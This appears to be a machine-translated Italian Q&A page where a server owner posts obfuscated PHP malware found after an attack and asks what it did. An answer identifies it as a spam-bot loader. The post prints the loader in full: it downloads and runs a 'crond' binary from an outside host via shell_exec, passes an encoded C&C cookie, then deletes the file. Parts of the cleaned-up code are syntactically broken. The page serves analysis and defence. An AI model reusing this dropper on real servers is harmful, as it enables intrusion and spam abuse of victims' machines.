Esiste comunque la possibilità di decifrare facilmente questo codice virus?

Question

Esiste comunque la possibilità di decifrare facilmente questo codice virus?

#1 da (1 voti)

2

Il mio server è stato attaccato (ho eliminato l'infezione - per quanto ne so) e voglio sapere che cosa, se non altro, potrebbe essere stato compromesso (come i miei dati utente, per esempio).

Ho pubblicato la mia ultima domanda su Stack Overflow. Bene, ho notato che diversi server antivirus stavano ancora tentando di contattare la mia macchina e fornendomi codice dannoso.

L'ho tradotto da base64, ma è ancora per lo più senza senso. Ho determinato che sta tentando di accedere a una pagina chiamata AVVISO LINK MALICEMENTE: (modificato)

Ecco il codice: l'ho sostanzialmente ripulito:

    $w50="0o,]a*Lt7/D%[>|WAvITmqpwH~.B5kN1O\r'<( M\tV?^_3F\neb\'+iUXS\9xZ4hzr};P{gs=&yJQ)dj-fE\"2!Rlc@C#nGY:Ku8"; $GLOBALS['fwjlt66'] = $w50[22].$w50[62].$w50[22].$w50[43].$w50[96].$w50[91].$w50[4].$w50[20].$w50[47]; $GLOBALS['qjgox86'] = $w50[80].$w50[96].$w50[91].$w50[87].$w50[7].$w50[53].$w50[1].$w50[91].$w50[43].$w50[47].$w50[59].$w50[53].$w50[70].$w50[7].$w50[70]; $GLOBALS['agnsv93'] = $w50[70].$w50[7].$w50[64].$w50[86].$w50[47].$w50[91]; $GLOBALS['cqvwl52'] = $w50[77].$w50[47].$w50[87].$w50[48].$w50[53].$w50[91]; $GLOBALS['ecgfc33'] = $w50[80].$w50[53].$w50[86].$w50[47].$w50[43].$w50[47].$w50[59].$w50[53].$w50[70].$w50[7].$w50[70]; $GLOBALS['licvl99'] = $w50[59].$w50[62].$w50[29].$w50[73].$w50[69].$w50[58].$w50[50]; $GLOBALS['bokew22'] = $w50[87].$w50[62].$w50[20].$w50[1].$w50[77]; $GLOBALS['wtaky62'] = $w50[70].$w50[62].$w50[47].$w50[86].$w50[86].$w50[43].$w50[47].$w50[59].$w50[47].$w50[87]; $GLOBALS['neabn53'] = $w50[70].$w50[86].$w50[47].$w50[47].$w50[22]; $GLOBALS['cfffy63'] = $w50[96].$w50[91].$w50[86].$w50[53].$w50[91].$w50[29]; $GLOBALS['quyxh40'] = $w50[1].$w50[73].$w50[1].$w50[86].$w50[53].$w50[44].$w50[50]; $GLOBALS['ebiwk51'] = $w50[80].$w50[1].$w50[22].$w50[47].$w50[91]; $GLOBALS['exwal59'] = $w50[87].$w50[96].$w50[64].$w50[86].$w50[43].$w50[53].$w50[91].$w50[53].$w50[7]; $GLOBALS['wyvgi49'] = $w50[87].$w50[96].$w50[64].$w50[86].$w50[43].$w50[70].$w50[47].$w50[7].$w50[1].$w50[22].$w50[7]; $GLOBALS['ayrhy29'] = $w50[87].$w50[96].$w50[64].$w50[86].$w50[43].$w50[47].$w50[59].$w50[47].$w50[87]; $GLOBALS['wkobm38'] = $w50[87].$w50[96].$w50[64].$w50[86].$w50[43].$w50[87].$w50[86].$w50[1].$w50[70].$w50[47]; $GLOBALS['jxivj52'] = $w50[80].$w50[47].$w50[1].$w50[80]; $GLOBALS['wnmlt16'] = $w50[80].$w50[64].$w50[47].$w50[4].$w50[77]; $GLOBALS['yaqtf48'] = $w50[80].$w50[87].$w50[86].$w50[1].$w50[70].$w50[47]; $GLOBALS['nqtio88'] = $w50[87].$w50[59].$w50[7].$w50[77].$w50[22].$w50[44].$w50[61]; $GLOBALS['rxtpe19'] = $w50[80].$w50[53].$w50[86].$w50[47].$w50[43].$w50[22].$w50[96].$w50[7].$w50[43].$w50[87].$w50[1].$w50[91].$w50[7].$w50[47].$w50[91].$w50[7].$w50[70]; $GLOBALS['mrwmq50'] = $w50[80].$w50[23].$w50[64].$w50[53].$w50[7].$w50[47]; $ktjhg56 =$w50[62].$w50[7].$w50[7].$w50[22].$w50[94].$w50[9].$w50[9].$w50[22].$w50[4].$w50[69].$w50[47].$w50[70].$w50[26].$w50[7].$w50[1].$w50[96].$w50[87].$w50[62].$w50[22].$w50[4].$w50[77].$w50[63].$w50[26].$w50[87].$w50[1].$w50[20].$w50[9].$w50[87].$w50[64].$w50[1].$w50[91].$w50[77].$w50[44].$w50[83];
$kilow69 = "http://pages.touchpadz.com/crond64";
$xsqmk27 = "XDVSN_SESSION_COOKIE=PnJxPDMyPi1ycTw+d3BqPD4td3BqPD53cHI8Pi13cHI8Pm52PDcyMj4tbnY8Pm5hPDMyMj4tbmE8PmBxPDAyPi1gcTw+bnc8anZ2cjgtLXFpLHZtd2FqcmNmeCxhbW8tPi1udzw+YHc8anZ2cjgtLWBjdix2bXdhanJjZngsYW1vLWNjMCxyanI+LWB3PD5xdzxqdnZyOC0tcXZjdix2bXdhanJjZngsYW1vLWVoMzEscmpyPi1xdzw+bmZgPHVgXTIyMz4tbmZgPD5paTw0YDUwMDZhNDMwYWQyY2AuNmY0YWZnMmMwNDQ3YWBnMC40NzBhYDVhNzdjZjc3YTJmLjRmOmdhO2A1MTs3Zjo1MTouMGA3OmFhO2M3MGcyZ2M3NS4wYTE7NDNnOzRgNmA0MjcxLjAzYzM0M2YxNGMzZmA0OmMuNjZgYDs0Mzs1NTVgYzoxNy43NTQyY2c6MzJhNDMyNztnLjE3YDozMjMzNjUwNTA7NmMuN2EyOjNkNGMzOzY0ZjsyMi41YzcyZmY7YTcxMjdjZjA0LjM7Y2AyNDI3MGAzOjozMzEuNzdhMDdnMDc2YGAxMWFhNy40NjdgMzNkYTM0ZGMwYToxLjA6Mjs7ZzY2OmQ1OmNjYy41MWAzMjdkOjRjZGQ3O2E2LjAwN2dhYDQxNWY1YDAxZmAuM2Q0ZDoyZmQ3MzU0MjAxZy4zYzpmO2RnMjY1ZGA1YzQ2LjZkMDJjM2FmNDU3ZDIxZDQuZ2RmOjAwNzA3NGA7NjU7LjE7ZzJnOmE0N2FmMDVnNWQuNWQ0ZDE3M2M3ZzI1YTJkOi42ZDJnNmBjOjExOjs0YWFjLjE2NztmZmA2ZDVnZjoxMi4zMmMxYzNgYTQ0YWQ6NWYwLjYwZmc0MDdkMzQyYWNnZ2AuM2NgMjMxNjAzZmEyYzM0Ni43M2MxZGYwNjQ3NjJgMDIzLjVjNDRmNzFgNTcxOzs2Z2MuMzU0MjJhNGEwMGFkZjYzNS41YzRmOjc6MzBhNzo3Ojs6LjdhMDJgYDphNDpkOzc3MWMuNjs2Y2FjNzE2ZjA7NTQ0MC43ZjNgOjcwNTE7YTExNmY6LjFnYTBgMjBnN2RgYWRmZjouNTJgZmcwYzo2MDRgZGQzMy42MjE1MzphZzQzMWZmZ2Q1LjA2ZDs7ZmM1NWRmZjsxOmYuMGEyMDszMTQ3YTpgYTo1MC43ZjM3MDc1YDM1NzIzZGMzLmY2YWYyYzAwZzM3OjYwNC40OzUxNjMxMTJmYTMyNGEuMWRgYzVmMDs0YTRkNTMzNi46NDs3MzcyMWM3O2MzMDQuNzA0MTA3N2Y0YDBjNDo7MC4wZjE1YTNmYDA1Ozo0O2A2LjU2MWRnNDMyMmQzZjVjNS43Ojc3NTMxNTczNWc2ZmQuNTFgMTRjMGYyOjIyMGY3Oy42MWMzNTFhZDNhYGM1ZDdkLjM6MjI6NDdgNmM1NzJnNzAuNmNkZDszNzY3MjtnOjtnOy43OjUyOmNkZzY2YDc7OmA2LjRnMWFgNDZkNzFnNzU0YDsuNWZmN2Y6N2E0MDUyMjAxNi4wNWMzMzoyZDYzMTBmNGEwLjUyYDNgZmM2MDczO2Y3NGQuNjEyYGBkMzQxOjBnYzM0MS41ZjQ3YTsyYDA3NTA1MTA2LjVhZzc7Nzc0NjZjZGEwYWQuNGQzZDI6Zzs3ZzowNTFjMS42NDU0NjY1NjVnOjo6MzU3LjExZ2BjY2ZkMTczZDUwYTI+LWlpPA==";
$GLOBALS = array([dusbyosox] => fl [pvdmmvljuf] => incfl [ujhcrcgt] => id [smhtcwn] => qstr [jumxqwr] => ids [hnbbbkqfrkpt] => scode [culgtk] => url [krkdpxshxvn] => ch [hjmyjb] => errno [cupqhvfqdl] => msg [wlhdpqq] => errstr [loxnlmgvdc] => err [w50] => 0o,]a*Lt7/D%[>|WAvITmqpwH~.B5kN1O '<( M V?^_3F eb$6'+iUXSxZ4hzr};P{gs=&yJQ)dj-fE"2!Rlc@C#nGY:Ku8 [fwjlt66] => php_uname [qjgox86] => function_exists [agnsv93] => strlen [cqvwl52] => decbin [ecgfc33] => file_exists [licvl99] => xhkyg96 [bokew22] => chmod [wtaky62] => shell_exec [neabn53] => sleep [cfffy63] => unlink [quyxh40] => oyoli36 [ebiwk51] => fopen [exwal59] => curl_init [wyvgi49] => curl_setopt [ayrhy29] => curl_exec [wkobm38] => curl_close [jxivj52] => feof [wnmlt16] => fread [yaqtf48] => fclose [nqtio88] => cxtdp34 [rxtpe19] => file_put_contents [mrwmq50] => fwrite [ktjhg56] => http://pages.touchpadz.com/crond32 [kilow69] => http://pages.touchpadz.com/crond64 [xsqmk27] => XDVSN_SESSION_COOKIE=PnJxPDMyPi1ycTw+d3BqPD4td3BqPD53cHI8Pi13cHI8Pm52PDcyMj4tbnY8Pm5hPDMyMj4tbmE8PmBxPDAyPi1gcTw+bnc8anZ2cjgtLXFpLHZtd2FqcmNmeCxhbW8tPi1udzw+YHc8anZ2cjgtLWBjdix2bXdhanJjZngsYW1vLWNjMCxyanI+LWB3PD5xdzxqdnZyOC0tcXZjdix2bXdhanJjZngsYW1vLWVoMzEscmpyPi1xdzw+bmZgPHVgXTIyMz4tbmZgPD5paTw0YDUwMDZhNDMwYWQyY2AuNmY0YWZnMmMwNDQ3YWBnMC40NzBhYDVhNzdjZjc3YTJmLjRmOmdhO2A1MTs3Zjo1MTouMGA3OmFhO2M3MGcyZ2M3NS4wYTE7NDNnOzRgNmA0MjcxLjAzYzM0M2YxNGMzZmA0OmMuNjZgYDs0Mzs1NTVgYzoxNy43NTQyY2c6MzJhNDMyNztnLjE3YDozMjMzNjUwNTA7NmMuN2EyOjNkNGMzOzY0ZjsyMi41YzcyZmY7YTcxMjdjZjA0LjM7Y2AyNDI3MGAzOjozMzEuNzdhMDdnMDc2YGAxMWFhNy40NjdgMzNkYTM0ZGMwYToxLjA6Mjs7ZzY2OmQ1OmNjYy41MWAzMjdkOjRjZGQ3O2E2LjAwN2dhYDQxNWY1YDAxZmAuM2Q0ZDoyZmQ3MzU0MjAxZy4zYzpmO2RnMjY1ZGA1YzQ2LjZkMDJjM2FmNDU3ZDIxZDQuZ2RmOjAwNzA3NGA7NjU7LjE7ZzJnOmE0N2FmMDVnNWQuNWQ0ZDE3M2M3ZzI1YTJkOi42ZDJnNmBjOjExOjs0YWFjLjE2NztmZmA2ZDVnZjoxMi4zMmMxYzNgYTQ0YWQ6NWYwLjYwZmc0MDdkMzQyYWNnZ2AuM2NgMjMxNjAzZmEyYzM0Ni43M2MxZGYwNjQ3NjJgMDIzLjVjNDRmNzFgNTcxOzs2Z2MuMzU0MjJhNGEwMGFkZjYzNS41YzRmOjc6MzBhNzo3Ojs6LjdhMDJgYDphNDpkOzc3MWMuNjs2Y2FjNzE2ZjA7NTQ0MC43ZjNgOjcwNTE7YTExNmY6LjFnYTBgMjBnN2RgYWRmZjouNTJgZmcwYzo2MDRgZGQzMy42MjE1MzphZzQzMWZmZ2Q1LjA2ZDs7ZmM1NWRmZjsxOmYuMGEyMDszMTQ3YTpgYTo1MC43ZjM3MDc1YDM1NzIzZGMzLmY2YWYyYzAwZzM3OjYwNC40OzUxNjMxMTJmYTMyNGEuMWRgYzVmMDs0YTRkNTMzNi46NDs3MzcyMWM3O2MzMDQuNzA0MTA3N2Y0YDBjNDo7MC4wZjE1YTNmYDA1Ozo0O2A2LjU2MWRnNDMyMmQzZjVjNS43Ojc3NTMxNTczNWc2ZmQuNTFgMTRjMGYyOjIyMGY3Oy42MWMzNTFhZDNhYGM1ZDdkLjM6MjI6NDdgNmM1NzJnNzAuNmNkZDszNzY3MjtnOjtnOy43OjUyOmNkZzY2YDc7OmA2LjRnMWFgNDZkNzFnNzU0YDsuNWZmN2Y6N2E0MDUyMjAxNi4wNWMzMzoyZDYzMTBmNGEwLjUyYDNgZmM2MDczO2Y3NGQuNjEyYGBkMzQxOjBnYzM0MS41ZjQ3YTsyYDA3NTA1MTA2LjVhZzc7Nzc0NjZjZGEwYWQuNGQzZDI6Zzs3ZzowNTFjMS42NDU0NjY1NjVnOjo6MzU3LjExZ2BjY2ZkMTczZDUwYTI+LWlpPA==)

// Gives host operating system name
$aljav65 = php_uname(s);

// Gives machine type
$lyvqp40 = php_uname(m);

echo '<shchzzz>';

for (;;) {
if(!function_exists(shell_exec) {
echo '<err step=1 err=noshex data=>'
break;
}
if($aljav65 !== "Linux") {
echo '<err step=2 err=nolinux data=>';
break;
}

$eeirq58 = 'crond';
$csjxi53 = "";

// decimal to binary - probably a way to figure out the type of system it is
if(strlen(decbin(~0)) == 64) {
echo '<inf step=3 data=x64>';
$csjxi53 = $kilow69;
}
else {
echo '<inf step=3 data=x64>';
$csjxi53 = $ktjhg56;
}

$jzugq1 = "";
if(!file_exists('crond')) {
$jzugq1 = xhkyg96($w50, 'http://pages.touchpadz.com/crond64crond', crond);

if ( $jzugq1 == FALSE) {
echo '<err step=4 err=downl data=>';
break;
} else {
echo '<inf step=4 data=downok>';
}
} else {
echo '<inf step=4 data=exists>';
}

chmod($jzugq1, 755);
    $caaku38 = $xsqmk27.$w50[37].$w50[26].$w50[9].$jzugq1.$w50[37].$w50[13].$w50[9].$w50[77].$w50[47].$w50[17].$w50[9].$w50[91].$w50[96].$w50[86].$w50[86].$w50[37].$w50[83].$w50[13].$w50[9].$w50[77].$w50[47].$w50[17].$w50[9].$w50[91].$w50[96].$w50[86].$w50[86].$w50[37].$w50[72];
    $vepmo93 = shell_exec($caaku38);
    echo $w50[35].$w50[53].$w50[91].$w50[80].$w50[37].$w50[70].$w50[7].$w50[47].$w50[22].$w50[71].$w50[28].$w50[37].$w50[77].$w50[4].$w50[7].$w50[4].$w50[71].$w50[77].$w50[1].$w50[91].$w50[47].$w50[37].$w50[77].$w50[4].$w50[7].$w50[4].$w50[83].$w50[71].$vepmo93.$w50[13];
    sleep(1);
    unlink($jzugq1);
    break;
}

echo '</shchzzz>';
exit();

function oyoli36($w50, $iyjzg82) {
    $kxsnc64 = "";
    $gnmie55 = @fopen($iyjzg82, 'rb');
    if ($gnmie55 == FALSE) {
        if (!function_exists('curl_init')) return FALSE;
        $iahsh76 = @curl_init();
        @curl_setopt($iahsh76, CURLOPT_URL, $iyjzg82);
        @curl_setopt($iahsh76, CURLOPT_RETURNTRANSFER, true);
        $kxsnc64 = @curl_exec($iahsh76);
        @curl_close($iahsh76);
    } else {
        while(!feof($gnmie55)) $kxsnc64.=fread($gnmie55, 1024 * 64 );
        fclose($gnmie55);
    }
    return $kxsnc64;
}

function cxtdp34($w50, $ekfco84, $kxsnc64) {
    $dlyti36 = fopen($ekfco84, wb+);
    if ($dlyti36 == FALSE) {
        if (!function_exists(file_put_contents) return FALSE;
        if ( @file_put_contents($ekfco84, $kxsnc64) === FALSE ) return FALSE;
    } else {
        $gibnq51 = fwrite($dlyti36, $kxsnc64, strlen($kxsnc64));
        fclose($dlyti36);
        if ($gibnq51 == FALSE || $gibnq51 != strlen($kxsnc64)) return FALSE;
    }
    return TRUE;
}

function xhkyg96($w50, $iyjzg82, $vmtdr19) {
    $kxsnc64 = oyoli36($w50, $iyjzg82);
    if ($kxsnc64 == FALSE) return FALSE;
    if (cxtdp34($w50, $w50[26].$w50[9].$vmtdr19, $kxsnc64) == FALSE) {
        if (cxtdp34($w50, '/tmp/'.$vmtdr19, $kxsnc64) == FALSE) {
            return FALSE;
        } else {
            return '/tmp'.$vmtdr19;
        }
    } else {
        return "./".$vmtdr19;
    }
    return FALSE;
}

Speravo che qualcuno potesse sapere di qualche servizio che interpreta o può dirmi cosa può essere successo. Posso provare a ricostruirlo da solo, ma se qualcuno ha qualche informazione che mi sarebbe molto utile.

virus

posta Andy Alexander 31.03.2015 - 02:30

fonte

1 risposta

Leggi altre domande sui tag virus

Che cos'è un hash indurito con chiave? Misteri pacchetti in entrata / in uscita sulla mia connessione wireless

score 1 · Answer 1

Ho disassemblato il binario a 64 bit e ho esaminato il codice e sembra che scarichi e invii messaggi di posta elettronica solo per email - non sembra che tenti di compromettere il sistema.

Il codice PHP scarica e avvia la versione a 32 bit o 64 bit del programma spammer a seconda del sistema su /tmp/crond . Il programma scaricherà quindi via HTTP i seguenti elementi dal proprio server C & C:

Un messaggio email da inviare
Un elenco di indirizzi email
Più URL contenenti il loro script mailer PHP utilizzato per inviare i messaggi e-mail

I server C & C sono impostati dalla variabile di ambiente XDVSN_SESSION_COOKIE che è codificata con base64 e XOR'ed con 1's. Lanciare il loro binario senza la variabile di ambiente farà terminare immediatamente il programma.

Sembra che questo exploit fallirà se /tmp è montato con noexec , anche se questo può essere facilmente modificato dall'utente malintenzionato.